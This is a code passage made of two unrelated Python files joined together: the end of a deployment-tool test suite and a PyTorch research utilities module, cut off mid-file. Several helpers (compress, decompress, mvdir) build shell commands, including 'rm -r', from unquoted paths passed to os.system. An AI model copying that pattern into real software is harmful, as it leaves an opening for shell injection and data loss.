{'roles': ['compute', 'cinder'], 'status': 'provisioned'},
{'roles': ['compute'], 'status': 'provisioned'},
{'roles': ['cinder'], 'status': 'provisioned'}])
nodes = TaskHelper.nodes_to_deploy(cluster)
self.assertEqual(len(nodes), 6)
controllers = self.filter_by_role(nodes, 'controller')
self.assertEqual(len(controllers), 3)
cinders = self.filter_by_role(nodes, 'cinder')
self.assertEqual(len(cinders), 2)
computes = self.filter_by_role(nodes, 'compute')
self.assertEqual(len(computes), 2)
# TODO(aroma): move it to utils testing code
def test_recalculate_deployment_task_progress(self):
cluster = self.create_env([
{'roles': ['controller'],
'status': 'provisioned',
'progress': 100},
{'roles': ['compute'],
'status': 'deploying',
'progress': 100},
{'roles': ['compute'],
'status': 'ready',
'progress': 0},
{'roles': ['compute'],
'status': 'discover',
'progress': 0}])
task = Task(name='deploy', cluster_id=cluster.id)
self.db.add(task)
self.db.commit()
progress = TaskHelper.recalculate_deployment_task_progress(task)
self.assertEqual(progress, 25)
# TODO(aroma): move it to utils testing code
def test_recalculate_provisioning_task_progress(self):
cluster = self.create_env([
{'roles': ['controller'],
'status': 'provisioned',
'progress': 100},
{'roles': ['compute'],
'status': 'provisioning',
'progress': 0}])
task = Task(name='provision', cluster_id=cluster.id)
self.db.add(task)
self.db.commit()
progress = TaskHelper.recalculate_provisioning_task_progress(task)
self.assertEqual(progress, 50)
def test_get_task_cache(self):
expected = {"key": "value"}
task = Task()
task.cache = expected
self.db.add(task)
self.db.flush()
actual = TaskHelper.get_task_cache(task)
self.assertDictEqual(expected, actual)
task_from_db = objects.Task.get_by_uuid(task.uuid)
self.db.delete(task_from_db)
self.db.flush()
expected = {}
actual = TaskHelper.get_task_cache(task)
self.assertDictEqual(expected, actual)
def test_prepare_action_log_kwargs_with_web_ctx(self):
self.env.create(
nodes_kwargs=[
{'roles': ['compute'], 'provisioning': True},
]
)
cluster = self.env.clusters[0]
task = Task(name='provision', cluster_id=cluster.id)
self.db.add(task)
self.db.flush()
actor_id = 'xx'
with mock.patch.dict(web.ctx,
{'env': {'fuel.action.actor_id': actor_id}}):
kwargs = TaskHelper.prepare_action_log_kwargs(task)
self.assertIn('actor_id', kwargs)
self.assertEqual(actor_id, kwargs['actor_id'])
with mock.patch.dict(web.ctx, {'env': {}}):
kwargs = TaskHelper.prepare_action_log_kwargs(task)
self.assertIn('actor_id', kwargs)
self.assertIsNone(kwargs['actor_id'])
def test_prepare_action_log_kwargs_without_web_ctx(self):
self.env.create(
nodes_kwargs=[
{'roles': ['compute'], 'pending_addition': True},
{'roles': ['controller'], 'pending_addition': True},
]
)
cluster = self.env.clusters[0]
deployment_task = Task(name='deployment', cluster_id=cluster.id)
self.db.add(deployment_task)
self.db.flush()
# Checking with task without parent
kwargs = TaskHelper.prepare_action_log_kwargs(deployment_task)
self.assertIn('actor_id', kwargs)
self.assertIsNone(kwargs['actor_id'])
# Checking with empty actor_id in ActionLog
al_kwargs = TaskHelper.prepare_action_log_kwargs(deployment_task)
al = objects.ActionLog.create(al_kwargs)
check_task = Task(name='check_before_deployment',
cluster_id=cluster.id,
parent_id=deployment_task.id)
self.db.add(check_task)
self.db.flush()
kwargs = TaskHelper.prepare_action_log_kwargs(check_task)
self.assertIn('actor_id', kwargs)
self.assertIsNone(kwargs['actor_id'])
# Checking with actor_id is not None in ActionLog
actor_id = 'xx'
al.actor_id = actor_id
self.db.flush()
kwargs = TaskHelper.prepare_action_log_kwargs(check_task)
self.assertIn('actor_id', kwargs)
self.assertEqual(actor_id, kwargs['actor_id'])
|
"""All-purpose utility file with helpers for
- PyTorch tensor processing (flattening, unflattening, vjp, jvp),
- plotting,
- custom gradient checking (gradient wrt parameters, and second-order gradients),
- meters (ema, online average),
- custom learning rate schedules,
- ema model averaging,
- google cloud storage utilities,
- custom context managers (Timer, DisableGC),
- checkpoint storage/loading, and
- data loaders,
- misc log sanitization.
"""
import abc
import argparse
import collections
import contextlib
import copy
import csv
import datetime
import gc
import io
import json
import logging
import math
import os
import random
import shutil
import signal
import sys
import time
from typing import Callable, Dict, Iterator, List, Optional, Sequence, Tuple, Union
import warnings
import numpy as np
import requests
from scipy import stats
import six
import torch
from torch import nn, optim
import torch.nn.functional as F
from torch.utils import data
import tqdm
# Misc.
home = os.path.expanduser("~")
home_data = os.path.join(home, 'data')
join = os.path.join
pathexists = os.path.exists
makedirs = os.makedirs
dirname = os.path.dirname
def set_trace():
import pdb
pdb.set_trace()
def float2str(x, precision=8):
return f"{x:.{precision}f}".replace('.', "_")
def int2str(x, leading_zeros=8):
return f"{x:0{leading_zeros}d}"
def average_over_seed(seq_of_seq):
min_len = min(len(seq) for seq in seq_of_seq)
seq_of_seq = [seq[:min_len] for seq in seq_of_seq]
seq_of_seq = np.array(seq_of_seq)
return seq_of_seq.mean(0), seq_of_seq.std(0)
def single_standard_deviation(sample, return_type="tuple"):
if return_type == "tuple":
return np.mean(sample), np.std(sample)
elif return_type == "dict":
return dict(mean=np.mean(sample), delta=np.std(sample))
else:
raise ValueError(f"Unknown return_type: {return_type}")
def confidence_interval(sample, alpha=0.05):
"""Compute (asymptotic) confidence interval under the normality assumption.
Assumes each sample is drawn from a normal distribution.
This could still work if you have a large number of samples.
"""
alpha2zscore = {
0.01: 2.58,
0.02: 2.33,
0.05: 1.960,
0.1: 1.645,
0.15: 1.440,
}
if isinstance(sample, (list, tuple)):
sample = torch.tensor(sample)
sample: torch.Tensor
if not sample.dim() == 1:
raise ValueError(f"`sample` must be 1-dimensional.")
sample_size = len(sample)
sample_mean = sample.mean()
sample_std = sample.std(unbiased=False)
zscore = alpha2zscore[alpha]
delta = zscore * sample_std / math.sqrt(sample_size)
low = sample_mean - delta
high = sample_mean + delta
return dict(low=low, high=high, delta=delta, mean=sample_mean)
def jdump(obj: Union[str, dict, list], f: str, mode="w", indent=4, to_gcs=False, default=None):
"""Dump a str or dictionary to a file in json format.
Args:
obj: An object to be written.
f: A string path to the location on disk.
mode: Mode for opening the file.
indent: Indent for storing json dictionaries.
to_gcs: Upload the file to cloud storage.
default: A function to handle non-serializable entries; defaults to `None`.
Returns:
None.
"""
os.makedirs(os.path.dirname(f), exist_ok=True)
with open(f, mode=mode) as file:
if isinstance(obj, (dict, list)):
json.dump(obj, file, indent=indent, default=default)
elif isinstance(obj, str):
file.write(obj)
else:
raise ValueError(f'Unexpected type: {type(obj)}')
if to_gcs:
gs_upload_from_path(f)
logging.warning(f"Uploading to gcs: {f}")
def jdumps(obj, indent=4):
return json.dumps(obj, indent=indent)
def jload(f: Union[str, io.IOBase], mode="r"):
"""Load a .json file into a dictionary."""
if not isinstance(f, io.IOBase):
f = open(f, mode=mode)
jdict = json.load(f)
f.close()
return jdict
def read_csv(f: Union[str, io.IOBase], mode="r", delimiter='\t'):
if not isinstance(f, io.IOBase):
f = open(f, mode=mode)
reader = csv.DictReader(f, delimiter=delimiter)
out = dict(
fieldnames=reader.fieldnames,
rows=tuple(line for line in reader)
)
f.close()
return out
def write_csv(
f: str,
fieldnames: Union[List, Tuple],
rows: Union[Tuple, List], # Each line is a list with corresponding columns.
mode="w",
delimiter='\t'
):
os.makedirs(os.path.dirname(f), exist_ok=True)
f = open(f, mode=mode)
writer = csv.writer(f, delimiter=delimiter)
writer.writerow(fieldnames)
for row in rows:
writer.writerow(row)
f.close()
def readlines(f: Union[str, io.IOBase], mode="r", strip=True):
if not isinstance(f, io.IOBase):
f = open(f, mode=mode)
lines = f.readlines()
if strip:
lines = [line.strip() for line in lines]
f.close()
return lines
def listdir(directory, skip_suffixes: Union[Sequence, str] = (), full_path: Optional[bool] = False):
"""Convenience function to replace `os.listdir` for skipping annoying mac hidden files."""
if isinstance(skip_suffixes, str):
skip_suffixes = (skip_suffixes,)
skip_suffixes = tuple(skip_suffixes) + (".DS_Store",)
file_names = os.listdir(directory)
for skip_suffix in skip_suffixes:
file_names = [file_name for file_name in file_names if not file_name.endswith(skip_suffix)]
if full_path:
file_names = [os.path.join(directory, file_name) for file_name in file_names]
return file_names
def list_file_paths(directory, skip_suffixes: Union[Sequence, str] = ()):
"""Recursively go down the folder, list only files, and returns paths."""
if isinstance(skip_suffixes, str):
skip_suffixes = (skip_suffixes,)
skip_suffixes = tuple(skip_suffixes) + (".DS_Store",)
file_paths = [os.path.join(root, file) for root, dirs, files in os.walk(directory) for file in files]
for suffix in skip_suffixes:
file_paths = [file_path for file_path in file_paths if not file_path.endswith(suffix)]
return file_paths
# Backwards compat.
listfiles = list_file_paths
def listfds():
"""List all open file descriptors."""
return sorted(list(set(os.listdir('/proc/self/fd/'))))
def compress(path: str, out_path: Optional[str] = None):
"""Compress a file or folder; relies on `pigz`, a Linux utility.
Args:
path: Path to the file or folder to compress.
out_path: Path to the compressed file; defaults to the original path with the suffix `tar.gz` added.
Returns:
None.
"""
if out_path is None:
out_path = path + ".tar.gz"
with Timer(msg=f"Compressed file/folder: {path}", logging=True):
os.system(f"tar cf - {path} | pigz -9 > {out_path}")
def decompress(path: str, out_path: Optional[str] = None):
"""Decompress a file or a folder; relies on `pigz`, a Linux utility with multi-threading.
Args:
path (str): Path to file/folder to be decompressed.
out_path (str): Path to folder to put the decompressed, defaults to `None` which is current directory.
"""
with Timer(msg=f"Decompressed file: {path}", logging=True):
if out_path is not None:
os.system(f"tar -I pigz -xf {path} -C {out_path}")
else:
os.system(f"tar -I pigz -xf {path}")
def alleq(l: Sequence, f: Optional[Callable] = lambda x, y: x == y):
"""Check all arguments in a sequence are equal according to a given criterion.
Args:
f: A bi-variate boolean function.
l: A list/tuple.
Returns:
True if everything is equal; otherwise False.
"""
return all(f(l[0], li) for li in l[1:])
def zip_(*args: Sequence):
"""Assert sequences of same length before zipping."""
if len(args) == 0: return []
assert alleq(args, lambda x, y: len(x) == len(y))
return zip(*args)
def write_config(args: argparse.Namespace, file_name='argparse.json', config_path=None, attr="train_dir"):
"""Creates folders and write config.
Doesn't write if in `eval` mode.
"""
if not hasattr(args, attr):
return
train_dir = getattr(args, attr)
if train_dir is None:
return
os.makedirs(train_dir, exist_ok=True)
if config_path is None:
config_path = os.path.join(train_dir, file_name)
os.makedirs(os.path.dirname(config_path), exist_ok=True)
with open(config_path, 'w') as f:
json.dump(args.__dict__, f, indent=4)
logging.warning(f"Wrote config: {config_path}")
if ((hasattr(args, 'cloud_storage') and args.cloud_storage) or
(hasattr(args, 'to_gcs') and args.to_gcs)):
gs_upload_from_path(config_path, remove_local=False)
logging.warning(f"Uploaded to cloud: {config_path}")
def load_config(args: argparse.Namespace, file_name='argparse.json', config_path=None, replace_exclude=()):
if config_path is None:
config_path = os.path.join(args.train_dir, file_name)
with open(config_path, 'r') as f:
config = json.load(f)
for key in replace_exclude:
config.pop(key, None)
args.__dict__ = {**args.__dict__, **config}
def str2bool(v):
if isinstance(v, bool): return v
if v.lower() in ('yes', 'true', 't', 'y', '1'): return True
if v.lower() in ('no', 'false', 'f', 'n', '0'): return False
raise argparse.ArgumentTypeError('Boolean value expected.')
def str2int(v):
if isinstance(v, int): return v
if v.lower() in ("none",): return None
return int(v)
def gather_args(parser: argparse.ArgumentParser):
"""Gathers known and unknown args together.
Unknown args are arguments whose names we don't known before hand, and they aren't specified by `add_argument`.
"""
args, unknown_args = parser.parse_known_args()
unknown_options = collections.defaultdict(list)
key = None
for arg in unknown_args:
if arg.startswith('--'):
key = arg[2:]
elif arg.startswith('-'):
key = arg[1:]
else:
unknown_options[key].append(arg)
args.__dict__ = {**args.__dict__, **unknown_options}
return args
def flatten_nested_pystruct(sequence: Sequence):
"""Flatten nested python list/tuple/set and return a list of elements."""
if not isinstance(sequence, (tuple, list, set)):
return [sequence]
return [i for entry in sequence for i in flatten_nested_pystruct(entry)]
def parallel_sort(*args, key=None, reverse=False):
"""Parallel sort of multiple lists."""
# args: A bunch of sequences.
if key is None: key = lambda inputs: inputs[0] # Parallel sort based on the order of the first list.
ret = sorted(zip_(*args), key=key, reverse=reverse)
return tuple([ret_i[j] for ret_i in ret] for j in range(len(args)))
def linregress_slope(x, y):
"""Return the slope of a least-squares regression for two sets of measurements."""
return stats.linregress(x, y)[0]
def pretty_str(names: Sequence, vars: Sequence, precision: Optional[float] = 4):
ret = ""
for name, var in zip(names[:-1], vars[:-1]):
if isinstance(var, float):
ret += f"{name}: {var:.{precision}f}, "
else:
ret += f"{name}: {var}, "
ret += f"{names[-1]}: {vars[-1]}" # No comma after last.
return ret
class _SuppressAssertions(object):
def __init__(self, tqdm_range):
self.tqdm_range = tqdm_range
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is AssertionError:
self.tqdm_range.write('Caught AssertionError: ' + str(exc_val))
return True
def show_env(args_or_device=None):
if args_or_device is not None:
if hasattr(args_or_device, "device"):
args_or_device = args_or_device.device
elif hasattr(args_or_device, "no_gpu"):
args_or_device = "cuda" if torch.cuda.is_available() and not args_or_device.no_gpu else "cpu"
logging.warning(f"Running on device: {args_or_device}")
logging.warning(f"CUDA device count: {torch.cuda.device_count()}")
logging.warning(f"Running Python: \n{sys.version}; \nversion info: \n{sys.version_info}")
logging.warning(f"Running PyTorch: {torch.__version__}")
logging.warning(f"Running six: {six.__version__}")
def download_file_from_google_drive(id, destination, timeout=120):
"""Download a file hosted on Google drive with the id extracted from a sharable link."""
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
for chunk in tqdm.tqdm(response.iter_content(CHUNK_SIZE), desc="chunks"):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params={'id': id}, stream=True, timeout=timeout)
token = get_confirm_token(response)
if token:
params = {'id': id, 'confirm': token}
response = session.get(URL, params=params, stream=True, timeout=timeout)
os.makedirs(os.path.dirname(destination), exist_ok=True)
save_response_content(response, destination)
def isdigit(x):
if len(x) > 0 and x[0] in ('-', '+'):
return x[1:].isdigit()
return x.isdigit()
class Timeout(contextlib.ContextDecorator):
def __init__(self, seconds: Union[float, int], error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message) # This doesn't work in Py2.
def __enter__(self):
signal.signal(signal.SIGALRM, self.handle_timeout) # Create custom handler for SIGALRM.
# `signal.ITIMER_REAL` will deliver SIGALRM in `self.seconds`.
# Better than directly sending SIGALRM, which doesn't allow floating-point seconds.
signal.setitimer(signal.ITIMER_REAL, self.seconds)
def __exit__(self, exc_type, exc_val, exc_tb):
signal.alarm(0) # Cancel the previously set alarm if haven't timed out.
def rm(*paths: str):
"""Remove path or directory specified at path."""
for path in paths:
if not os.path.exists(path):
continue
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
def deduplicate(x: Union[List, Tuple]):
"""Remove duplicates in a list or tuple; preserves original order."""
return type(x)(dict.fromkeys(x))
def mvdir(src: str, tgt: str, tmp: str):
"""Move source directory to target directory.
Most helpful when you want to insert subdirectory in path, e.g.,
moving /home/path -> /home/path/sub.
Note naive `mv` does not work for this case!
"""
os.system(f'mv {src} {tmp}')
os.system(f'mkdir -p {tgt}')
os.system(f'mv {tmp}/* {tgt}')
os.system(f'rm -r {tmp}')
def handle_unused_kwargs(unused_kwargs, msg=None):
if len(unused_kwargs) > 0:
if msg is not None:
warnings.warn(f"{msg}: Unexpected arguments {unused_kwargs}")
else:
warnings.warn(f"Unexpected arguments {unused_kwargs}")
class ContainerMeta(type):
def all(cls):
return sorted(getattr(cls, x) for x in dir(cls) if not x.startswith('__'))
def __str__(cls):
return str(cls.all())
def __contains__(cls, item):
return item in cls.all()
def runs_tasks(
task: str,
task_names: Sequence[str],
task_callables: Sequence[Callable],
**kwargs,
):
for task_name, task_callable in zip_(task_names, task_callables):
if task == task_name:
return task_callable(**kwargs)
raise ValueError(f"Unknown task: {task}. Expected one of {task_names}")
# Torch.
def tsave(state_dicts: dict, path: str):
makedirs(dirname(path), exist_ok=True)
torch.save(state_dicts, path)
def collect_tensors(verbose=False):
"""Collect all referenced tensors; useful for debugging memory leak."""
count = 0
for obj in gc.get_objects():
try:
if torch.is_tensor(obj) or (hasattr(obj, 'data') and torch.is_tensor(obj.data)):
if verbose:
print(type(obj), obj.size())
count += 1
except Exception:
pass
logging.warning(f'Total number of tensors: {count}')
def log_shape(*args):
for i, arg in enumerate(args):
logging.warning(f'tensor {i}, shape: {arg.shape}')
def flatten(possibly_sequence: Union[torch.Tensor, Sequence[torch.Tensor]]):
if torch.is_tensor(possibly_sequence): return possibly_sequence.reshape(-1)
return torch.cat([p.reshape(-1) for p in possibly_sequence]) if len(possibly_sequence) > 0 else torch.tensor([])
def flatten_nested(possibly_sequence: Union[torch.Tensor, Sequence]):
if torch.is_tensor(possibly_sequence): return possibly_sequence.reshape(-1)
flat_tensors = [flatten_nested(entry) for entry in possibly_sequence]
return torch.cat(flat_tensors, dim=0) if len(flat_tensors) > 0 else torch.tensor([])
def ravel_pytree(possibly_sequence: Union[Sequence, torch.Tensor]) -> Tuple[torch.Tensor, Callable]:
if torch.is_tensor(possibly_sequence):
return possibly_sequence.reshape(-1), lambda x: x.reshape(possibly_sequence.size())
def make_unravel(size): # Need this function to copy size!
return lambda x: x.reshape(size)
unravels, flats, numels = [], [], []
for entry in possibly_sequence:
if torch.is_tensor(entry):
unravel_i = make_unravel(entry.size())
flat_i = entry.reshape(-1)
else:
flat_i, unravel_i = ravel_pytree(entry)
unravels.append(unravel_i)
flats.append(flat_i)
numels.append(flat_i.numel())
def unravel(flat: torch.Tensor):
return [unravel_(flat_) for flat_, unravel_ in zip_(flat.split(split_size=numels), unravels)]
return torch.cat(flats) if len(flats) > 0 else torch.tensor([]), unravel
def cat(args: Union[Tuple, List], dim=0, out=None):
"""Concatenation with broadcasting."""
size = [max(dims) for dims in zip_(*[list(t.size()) for t in args])]
return torch.cat([t.expand(size) for t in args], dim=dim, out=out)
def fill_tail_dims(y: torch.Tensor, y_like: torch.Tensor):
"""Fill in missing trailing dimensions for y according to y_like."""
return y[(...,) + (None,) * (y_like.dim() - y.dim())]
def channel_cat(t, y):
t = fill_tail_dims(t, y).expand_as(y[:, :1, ...])
return torch.cat((t, y), dim=1)
class Swish(nn.Module):
def __init__(self):
super(Swish, self).__init__()
def forward(self, x):
return _swish(x)
@torch.jit.script
def _swish(x):
return x * torch.sigmoid(x)
class Mish(nn.Module):
def forward(self, x):
return _mish(x)
@torch.jit.script
def _mish(x):
return x * torch.tanh(F.softplus(x))
def flat_to_shape(flat_tensor: torch.Tensor, shapes: Sequence):
"""Convert a flat tensor to a list of tensors with specified shapes.
`flat_tensor` must have exactly the number of elements as stated in `shapes`.
"""
numels = [shape.numel() for shape in shapes]
return [flat.reshape(shape) for flat, shape in zip_(flat_tensor.split(split_size=numels), shapes)]
def convert_none_to_zeros(sequence: Sequence[Union[torch.Tensor, type(None)]], like_sequence: Sequence[torch.Tensor]):
return [torch.zeros_like(q) if p is None else p for p, q in zip(sequence, like_sequence)]
def make_seq_requires_grad(sequence: Sequence[torch.Tensor]):
return [p if p.requires_grad else p.detach().requires_grad_(True) for p in sequence]
def is_strictly_increasing(ts):
return all(x < y for x, y in zip(ts[:-1], ts[1:]))
def make_any_check(func):
def any_check(*args, **kwargs):
inps = [arg for arg in args] + list(kwargs.values())
return any(func(inp) for inp in inps)
return any_check
isnan = make_any_check(lambda t: torch.isnan(t).any())
isinf = make_any_check(lambda t: torch.isinf(t).any())
def isnan_or_isinf(*args, **kwargs):
return isnan(*args, **kwargs) or isinf(*args, **kwargs)
def vjp(outputs, inputs, **kwargs):
if torch.is_tensor(inputs):
inputs = [inputs]
_dummy_inputs = [torch.as_strided(i, (), ()) for i in inputs] # Workaround for PyTorch bug #39784.
if torch.is_tensor(outputs):
outputs = [outputs]
outputs = make_seq_requires_grad(outputs)
_vjp = torch.autograd.grad(outputs, inputs, **kwargs)
return convert_none_to_zeros(_vjp, inputs)
def jvp(outputs, inputs, grad_inputs=None, **kwargs):
if torch.is_tensor(inputs):
inputs = [inputs]
_dummy_inputs = [torch.as_strided(i, (), ()) for i in inputs] # Workaround for PyTorch bug #39784.
if torch.is_tensor(outputs):
outputs = [outputs]
outputs = make_seq_requires_grad(outputs)
dummy_outputs = [torch.zeros_like(o, requires_grad=True) for o in outputs]
first_kwargs = copy.deepcopy(kwargs)
first_kwargs['create_graph'] = True
_vjp = torch.autograd.grad(
outputs, inputs, grad_outputs=dummy_outputs, **first_kwargs) # Must create graph to backprop a second time.
_jvp = torch.autograd.grad(_vjp, dummy_outputs, grad_outputs=grad_inputs, **kwargs)
return convert_none_to_zeros(_jvp, dummy_outputs)
def to_numpy(*possibly_tensors: Union[torch.Tensor, np.ndarray, float]):
arrays = possibly_tensors
arrays = [t.item() if isinstance(t, torch.Tensor) and t.numel() == 1 else t for t in arrays]
arrays = [t.detach().cpu().numpy() if isinstance(t, torch.Tensor) else t for t in arrays]
return arrays[0] if len(arrays) == 1 else arrays
def manual_seed(args_or_seed: Union[int, argparse.Namespace], hardcore=True, disable_tf=True):
if hasattr(args_or_seed, 'seed'):
args_or_seed = args_or_seed.seed
random.seed(args_or_seed)
np.random.seed(args_or_seed)
torch.manual_seed(args_or_seed)
torch.cuda.manual_seed_all(args_or_seed)
if hardcore:
# Avoid letting cudnn heuristics affect results.
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
os.environ['PYTHONHASHSEED'] = str(args_or_seed)
if not disable_tf:
try:
import tensorflow as tf
tf.random.set_seed(args_or_seed)
except ModuleNotFoundError:
logging.warning('Tensorflow not installed; ignoring set seed for tf.')
def get_dtype(dtype_str: str):
if dtype_str in ("single", "float32", "float"):
return torch.float
elif dtype_str in ("half", "float16"):
return torch.float16
elif dtype_str in ("double", "float64"):
return torch.float64
else:
raise ValueError(f"Unknown dtype: {dtype_str}")
def manual_dtype(args_or_dtype: Union[str, argparse.Namespace]):
dtype = args_or_dtype.dtype if hasattr(args_or_dtype, 'dtype') else args_or_dtype
if dtype in ('float64', 'double'):
torch.set_default_dtype(torch.float64)
elif dtype in ('float16', 'half'):
torch.set_default_dtype(torch.float16)
def trainable_parameters(*modules: nn.Module):
"""Return the parameters which require gradient."""
single_module = len(modules) == 1
outs = [
[param for param in module.parameters() if param.requires_grad] for module in modules
]
if single_module:
return outs[0]
return outs
def count_parameters(*modules: nn.Module, only_differentiable: Optional[bool] = False):
"""Count the number of parameters for each module."""
param_lists = [list(m.parameters()) for m in modules]
if only_differentiable:
param_lists = [[p for p in param_list if p.requires_grad] for param_list in param_lists]
numels = [sum(p.numel() for p in param_list) for param_list in param_lists]
return numels[0] if len(modules) == 1 else numels
def count_parameter_tensors(*modules: nn.Module, only_differentiable: Optional[bool] = False):
param_lists = [list(m.parameters()) for m in modules]
if only_differentiable:
param_lists = [[p for p in param_list if p.requires_grad] for param_list in param_lists]
lens = [len(param_list) for param_list in param_lists]
return lens[0] if len(modules) == 1 else lens
def count_tensor_list_size(tensor_list: Union[torch.Tensor, Sequence, Iterator], format="byte"):
"""Approximately count the size of a list of tensors in terms of bytes."""
if torch.is_tensor(tensor_list):
tensor_list = [tensor_list]
_bytes = 4 * sum([t.numel() for t in tensor_list])
if format == "byte":
return _bytes
elif format == "kb":
return _bytes / 1024
elif format == "mb":
return _bytes / 1024 ** 2
elif format == "gb":
return _bytes / 1024 ** 3
else:
raise ValueError(f"Unknown format: {format}")
class View(nn.Module):
def __init__(self, shape):
super(View, self).__init__()
self.shape = tuple(shape)
def forward(self, x):
return x.view((-1,) + self.shape)
class FuncWrapper(nn.Module):
def __init__(self, func):
super(FuncWrapper, self).__init__()
self.func = func
def forward(self, *args, **kwargs):
return self.func(*args, **kwargs)
class NormalizedEmbedding(nn.Embedding):
def __init__(self, *args, **kwargs):
super(NormalizedEmbedding, self).__init__(*args, **kwargs)
nn.init.normal_(self.weight, std=self.embedding_dim ** -0.5)
def subsequent_mask(size, device=None):
"""Mask out subsequent positions.
Useful for transformer training.
"""
return torch.triu(torch.ones((1, size, size), device=device), diagonal=1) == 0
def masks_from_lengths(lengths: torch.Tensor):
"""Create True/False mask based on lengths.
Useful for masking out padding tokens.
"""
return torch.arange(max(lengths), device=lengths.device)[None, :] < lengths[:, None]
def evaluate_prettiness(sampler=None,
folder=None,
input_2='cifar10-train',
n=50000,
batch_size=1000,
clean_afterwards=False,
fid=False,
isc=False,
kid=False):
"""Evaluate a generative model in terms of IS, FID, or KID.
At least one of `model` or `folder` must be present.
Args:
sampler (object, optional): An objective with the method `func` that samples from the model.
folder (str, optional): Path to the folder that contains all the images.
input_2 (str, optional): Name of registered dataset or a path to a folder.
n (int, optional): Number of samples to take.
batch_size (int, optional): Number of samples in each batch.
clean_afterwards (bool, optional): Clean the local cache if True.
Returns:
A dictionary of metric values.
"""
import torch_fidelity
import matplotlib.pyplot as plt
if sampler is None and folder is None:
raise ValueError(f"model and folder cannot both be none")
if folder is None:
now = datetime.datetime.now().strftime("%d:%m:%Y-%H:%M:%S")
folder = os.path.join(os.path.expanduser("~"), 'evaluate_prettiness', f'{now}')
os.makedirs(folder, exist_ok=True)
idx = 0
for _ in tqdm.tqdm(range(n // batch_size), desc='spawn samples'):
batch = sampler(batch_size=batch_size).detach().cpu().numpy()
if batch.shape[1] == 3:
batch = batch.transpose((0, 2, 3, 1))
for img in batch:
img_path = os.path.join(folder, f'{idx:06d}.png')
plt.imsave(img_path, img)
idx += 1
stats = torch_fidelity.calculate_metrics(folder, input_2, isc=isc, fid=fid, kid=kid)
if clean_afterwards:
shutil.rmtree(folder)
return stats
def coos2adj(coos: Sequence[torch.Tensor], lengths: torch.Tensor, device=None):
"""Convert coordinate format tensor/list into an adjacency matrix.
Args:
coos: A sequence of index tensors each of size (T, 2).
lengths: A tensor for the size of each entry of size (batch_size,).
Returns:
A single tensor of size (batch_size, max(lengths), max(lengths)) with 1s
at position with arcs and 0s otherwise.
"""
for possibly_tensor in (coos[0], lengths):
if torch.is_tensor(possibly_tensor) and device is None:
device = possibly_tensor.device
break
N = max(lengths)
if isinstance(N, torch.Tensor):
N = N.item()
return torch.stack(
[
torch.sparse_coo_tensor(
size=(N, N),
indices=coo.t().to(device),
values=torch.ones(size=(len(coo),), dtype=torch.long, device=device),
).to_dense()
for coo in coos
],
dim=0
)
def select_activation(activation="softplus"):
# Avoid materializing the objects; just return the constructors.
return {
"softplus": nn.Softplus,
"swish": Swish,
"mish": Mish,
"tanh": nn.Tanh,
"elu": nn.ELU,
"relu": lambda: nn.ReLU(inplace=True),
"leaky_relu": nn.LeakyReLU,
"gelu": nn.GELU,
}[activation]
def select_optimizer(optimizer):
def trim_dict(dictionary, keys):
"""Only grab specific keys from dictionary.
Useful to allow arbitrary kwargs be accepted so that constructor doesn't break.
"""
return {k: dictionary[k] for k in keys if k in dictionary}
def optimizer_factory(params, **kwargs):
if optimizer == "adam":
keys = ('lr', 'betas', 'eps', 'weight_decay', 'amsgrad')
return optim.Adam(params=params, **trim_dict(kwargs, keys))
elif optimizer == "sgd":
keys = ('lr', 'momentum', 'dampening', 'weight_decay', 'nesterov')
return optim.SGD(params=params, **trim_dict(kwargs, keys))
elif optimizer == "adagrad":
keys = ('lr', 'lr_decay', 'weight_decay', 'initial_accumulator_value', 'eps')
return optim.Adagrad(params=params, **trim_dict(kwargs, keys))
elif optimizer == "adamax":
keys = ('lr', 'betas', 'eps', 'weight_decay')
return optim.Adamax(params=params, **trim_dict(kwargs, keys))
elif optimizer == "adadelta":
keys = ('lr', 'rho', 'eps', 'weight_decay')
return optim.Adadelta(params=params, **trim_dict(kwargs, keys))
else:
raise ValueError(f"Unknown optimizer: {optimizer}")
return optimizer_factory
# Helper functions that mimic tensorflow variants.
# Properly tested against tensorflow==2.3.1
def scatter_nd(indices, updates, shape=None, out=None, accumulate=True, inplace=True):
if shape is None and out is None:
raise ValueError("`out` and `shape` cannot both be `None` for `scatter_nd`.")
if out is None:
out = torch.zeros(size=shape, device=updates.device, dtype=updates.dtype)
# `index_put` fails with non-contiguous tensors and produces uninterpretable error messages.
if not out.is_contiguous():
out = out.contiguous()
if inplace:
out.index_put_(
indices=[indices[:, i] for i in range(indices.size(1))],
values=updates, # noqa
accumulate=accumulate
) # noqa
else:
out = out.index_put(
indices=[indices[:, i] for i in range(indices.size(1))],
values=updates, # noqa
accumulate=accumulate
) # noqa
return out
def cosine_similarity(t1, t2):
return (t1 * t2).sum() / (t1.norm() * t2.norm())
def unravel_index(indices, shape):
"""Mimics np.unravel_index.
See Also
https://github.com/pytorch/pytorch/issues/35674
"""
unraveled_coords = []
for dim in reversed(shape):
unraveled_coords.append(indices % dim)
indices = indices // dim
return torch.stack(unraveled_coords[::-1], dim=-1)
def topk(input, k, dim=-1, largest=True, sorted=True):
"""Returns multi-dim indices.
See Also
https://stackoverflow.com/questions/64241325/top-k-indices-of-a-multi-dimensional-tensor
"""
v, i = torch.topk(input.flatten(), k=k, dim=dim, largest=largest, sorted=sorted)
return v, unravel_index(i, input.size())
def retrieval_scores(tp: Union[torch.Tensor, np.ndarray],
fp: Union[torch.Tensor, np.ndarray],
fn: Union[torch.Tensor, np.ndarray]):
"""Compute precision, recall, F1."""
def _stable_div(x, y):
"""Returns 0 if x == 0, else x / y."""
if not isinstance(x, np.ndarray):
return 0. if x == 0. else (x / y)
return np.where(x == 0, 0., x / y)
tp, fp, fn = tuple(to_numpy(t) for t in (tp, fp, fn))
precision = _stable_div(tp, tp + fp)
recall = _stable_div(tp, tp + fn)
f1 = _stable_div(2 * precision * recall, precision + recall)
return precision, recall, f1
# EMA model averaging.
# Only for backwards compatibility.
@torch.no_grad()
